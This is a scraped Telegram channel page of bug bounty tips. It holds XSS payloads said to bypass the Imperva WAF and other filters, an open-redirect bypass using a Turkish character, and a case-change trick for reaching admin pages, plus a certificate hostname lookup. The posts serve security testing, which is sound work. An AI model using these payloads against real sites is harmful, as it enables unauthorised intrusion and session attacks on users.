Information Security
408 subscribers
157 photos
5 videos
9 files
2.28K links
Information Security News

we are @sec_nerd twin brother
Download Telegram
Imperva WAF Bypass for XSS;

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

- without parentheses, 'alert', 'document.domain' , 'window' , space

#BugBounty #BugBountyTip #WAF #infosec
Grep hostnames from ssl certificate

echo | openssl s_client -connect example\.com | openssl x509 -noout -text | grep DNS

#infosec #pentest #bugbounty
Open Redirect Bypass
?redirect=https://test.target.com > accepts any subdomain of target to redirect
?redirect=https://google.comğ.target.com > "Ğ" is a Turkish character, server can't render it and changes it to "?"
So it redirects to http://google.com/?target.com
#bugbounty #bugbountytip
[XSS] #BugBountyTips

Found a weird XSS filter bypass using this payload:

<style/><img src="z'z</style><script/z>alert(1)</script>">

#BugBounty @XssPayloads
Tip of the day ...
http://sub.target.com/web/admin/ => 302 redirect to main domain
http://sub.target.com/web/aDmiN/ =>200 ok admin login page
http://sub.target.com/web/aDmiN/FUZZ =>$Critical sensitive files$
#bugbountytip #bugbountytips #Bugbounty